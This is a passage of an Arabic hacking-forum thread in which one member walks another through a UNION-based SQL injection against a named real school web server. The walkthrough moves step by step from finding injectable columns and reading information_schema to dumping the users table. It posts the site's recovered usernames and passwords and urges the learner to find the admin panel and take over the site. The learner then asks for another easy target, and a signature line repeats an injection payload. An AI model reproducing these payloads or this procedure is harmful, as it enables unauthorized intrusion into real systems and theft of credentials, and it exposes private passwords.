التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. خدماتنـــــا .:: ] > جـــ'ابات العناكــ'ب

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 06-25-2012, 11:27 PM   رقم المشاركة : 16 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 

 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road

افتراضي رد: سؤال بسيط فى دورة sql


تم العثور على الاسم والباص بس لسة فية تكملة بس اوحشة الموقع دة ان الاسم والباص انا مش شايفهم اصلا الموقع حد يجبهولى منة
وانا هاجرب شوية حجات
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_sche ma),2,3,4,5,6,7,8+from+information_schema.columns+ where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)--

   

رد مع اقتباس
قديم 06-25-2012, 11:43 PM   رقم المشاركة : 17 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي رد: سؤال بسيط فى دورة sql


أخي الكريم، للأسف يظهر أنك لا زلت مبتدأ في الـSQL مازال الوقت طويل أمامك

راح تكون هذه آخر مساعدة أقدر أعملهالك

و راح أشرح لك حقن هذا الموقع خطوة خطوة بدون أي صعوبة

لنبدأ على بركة الله :

الموقع مصاب و الدليل لما نضع الـ(') شوف :
['CODE]http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=1
[/CODE]

الآن راح نشوف عدد الأعمدة عن طريق الأمر order by و راح نجد العمود المصاب هو 1 و العمود يظهر يسار الصفحة كأنه عنوان و هذه هي الحقنة لحد الآن :

كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8--
الآن نشوف إصدار قاعدة البيانات من خلال العمود 1 و راح نجد أن الإصدار هو الإصدار رقم 5

نطبق الحقنة التالية مباشرة، لاحظ جيدا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns--
لحد الآن ماشاء الله الحقنة تعمل، الآن نروح نبحث عن العمود يلي إسمه يشبه %pas% و نكون وصلنا لهذه الحقنة :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+column_name+like+CHAR(37, 112, 97, 115, 37)--
ما شاء الله، و الحمد لله، ظهر العمود و كل شيء الخاص بالعمود لي يشبه %pas%

الآن نروح لسورس الصفحة و نشوف راح نجد المعلومات التالية :
users:passwd:berze_web

يعني أن إسم الجدول هو users و إسم العمود هو passwd

الآن نكمل الحقنة و راح تصير هكذا :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(table_name,0x3a,column_name,0x3a,table_schema),2,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273--
ما شاء الله، و الحمد لله، ظهرت لنا جميع الأعمدة الموجودة في الجدول users و هي :
login_name و passwd

و الآن نكمل حقنتنا عادي جدا، و نستخرج الباسوارد و اليوزر من خلال تكملة الحقنة لاحظ :
كود:
http://szerver2.berzeviczy.sulinet.hu/submenu.php?id=-1 UNION SELECT concat(login_name,0x3a,passwd),2,3,4,5,6,7,8+from+users--
ما شاء الله، و الحمد لله، إنتهينا و إستخرجنا معلومات الموقع و مدير الموقع وهذه هي :
user1 = rlaci
pass1= chipchip

user2= www
pass2= HEkbY3U6

الآن يبقى عليك تبحث عن مسار لوحة التحكم و تخترق الموقع و مبروك عليك

للأسف بحثت على اللوحة بسرعة لكن لم أجدها سامحني ليس لي الوقت لأقوم بفحص ملفات الموقع

هذا كل لي أقدر أساعدك فيه، و الله كتبت حتى التعب ههههه لكن مو غالي عنك

بالتوفيق إن شاء الله

تحيتي ...
التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

رد مع اقتباس
قديم 06-25-2012, 11:51 PM   رقم المشاركة : 18 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 

 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road

افتراضي رد: سؤال بسيط فى دورة sql


انا عملت كدة عل ى فكرة وشوف الرد فى فوق دة علطول هتلاقينى عملتة بس الباص مش شايفة اوى
الصورة مخبية علية انا كدة فرحان لانى عرفت وماشى صح شكرا ليك

   

رد مع اقتباس
قديم 06-25-2012, 11:55 PM   رقم المشاركة : 19 (permalink)
معلومات العضو
 
الصورة الرمزية TIKTAKram
 

 

 
إحصائية العضو







TIKTAKram غير متواجد حالياً

إرسال رسالة عبر MSN إلى TIKTAKram إرسال رسالة عبر Yahoo إلى TIKTAKram إرسال رسالة عبر Skype إلى TIKTAKram

 

 

إحصائية الترشيح

عدد النقاط : 10
TIKTAKram is on a distinguished road

افتراضي رد: سؤال بسيط فى دورة sql


لا شكر على واجب، أنا رجعت للمنتدى لأخدم أعضائه

بالتوفيق إن شاء الله و أتمنى أنك تسجل الشرح كإجابة للموضوع

حتى يستفاد الأعضاء الباقون

بالتوفيق

التوقيع

تم تغيير الإسم من Syst3m-32 إلى G3nius-Syst3m






ID=-1/**/UNION/**/SELECT 1,2,3,
concat(G3nius-Syst3m,0x3a,PASS),5,6+FROM+VbSpiders.Users--

 

   

رد مع اقتباس
قديم 06-26-2012, 12:06 AM   رقم المشاركة : 20 (permalink)
معلومات العضو
Mezo Shams
:: حبيبي يا رسول الله ::
 
الصورة الرمزية Mezo Shams
 

 

 
إحصائية العضو






Mezo Shams غير متواجد حالياً

إرسال رسالة عبر MSN إلى Mezo Shams إرسال رسالة عبر Yahoo إلى Mezo Shams

 

 

إحصائية الترشيح

عدد النقاط : 10
Mezo Shams is on a distinguished road

افتراضي رد: سؤال بسيط فى دورة sql


تم يا غالى بس انا عايز اخر طلب من حضرتك اخر طلب بس عايز كمان موقع واحد سهل بردو اجرب علية اشوف كدة انا بقيت حلو ولا لسة

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 02:45 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0